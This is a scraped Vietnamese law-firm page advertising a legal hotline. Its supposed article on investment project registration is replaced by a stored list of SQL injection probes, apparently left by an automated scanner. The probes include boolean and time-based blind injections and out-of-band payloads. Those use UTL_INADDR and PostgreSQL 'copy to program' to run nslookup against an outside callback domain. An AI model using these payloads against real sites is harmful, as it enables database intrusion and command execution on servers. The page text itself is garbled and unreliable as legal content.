Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Bản đăng kí dự án đầu tư

Cập nhật lần cuối lúc 09:27 ngày 19/07/2013

Nguồn: vinalaf.com.vn
1
1
1
1
-1 OR 2+924-924-1=0+0+0+1 --
-1 OR 3+924-924-1=0+0+0+1 --
1'"
-1 OR 3*2<(0+5+924-924) --
\
-1 OR 3*2>(0+5+924-924) --
-1 OR 2+605-605-1=0+0+0+1
-1 OR 3+605-605-1=0+0+0+1
1
@@Cnm47
JyI=
-1 OR 3*2<(0+5+605-605)
-1 OR 3*2>(0+5+605-605)
-1' OR 2+220-220-1=0+0+0+1 --
-1' OR 3+220-220-1=0+0+0+1 --
-1' OR 3*2<(0+5+220-220) --
-1' OR 3*2>(0+5+220-220) --
-1' OR 2+89-89-1=0+0+0+1 or 'qawg7uEY'='
-1' OR 3+89-89-1=0+0+0+1 or 'qawg7uEY'='
-1' OR 3*2<(0+5+89-89) or 'qawg7uEY'='
-1' OR 3*2>(0+5+89-89) or 'qawg7uEY'='
-1" OR 2+388-388-1=0+0+0+1 --
-1" OR 3+388-388-1=0+0+0+1 --
-1" OR 3*2<(0+5+388-388) --
-1" OR 3*2>(0+5+388-388) --
if(now()=sysdate(),sleep(11.75),0)/*'XOR(if(now()=sysdate(),sleep(11.75),0))OR'"XOR(if(now()=sysdate(),sleep(11.75),0))OR"*/
(select(0)from(select(sleep(11.75)))v)/*'+(select(0)from(select(sleep(11.75)))v)+'"+(select(0)from(select(sleep(11.75)))v)+"*/
-1; waitfor delay '0:0:17.625' --
-1); waitfor delay '0:0:17.625' --
1 waitfor delay '0:0:5.875' --
kGZWrh5F'; waitfor delay '0:0:5.875' --
-1;select pg_sleep(5.875); --
-1);select pg_sleep(11.75); --
-1));select pg_sleep(11.75); --
G4Hi2dyn';select pg_sleep(17.625); --
VTVDljak');select pg_sleep(17.625); --
RQmM052o'));select pg_sleep(17.625); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6719.34060.e6eaa.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6720.34060.e6eaa.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6721.34060.e6eaa.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6722.34060.e6eaa.\1.bxss.me
498'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: